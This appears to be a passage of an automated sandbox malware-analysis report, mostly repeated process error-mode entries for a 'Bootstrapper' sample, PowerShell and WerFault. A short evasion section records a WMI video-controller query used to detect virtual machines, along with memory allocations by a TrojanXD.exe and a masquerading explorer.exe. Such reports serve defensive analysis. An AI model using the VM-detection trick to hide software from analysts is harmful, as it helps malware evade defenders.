                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeMemory allocated: 1AA70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeMemory allocated: 247BDAE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeMemory allocated: 247D73B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeMemory allocated: 1AC8CBA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeMemory allocated: 1ACA6550000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 11D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 1ADB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: B40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 1A690000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: C10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 1A940000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 930000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 12C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 1AE10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeMemory allocated: 2BF9D0B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeMemory allocated: 2BFB6B40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: F00000 memory reserve | memory write watch
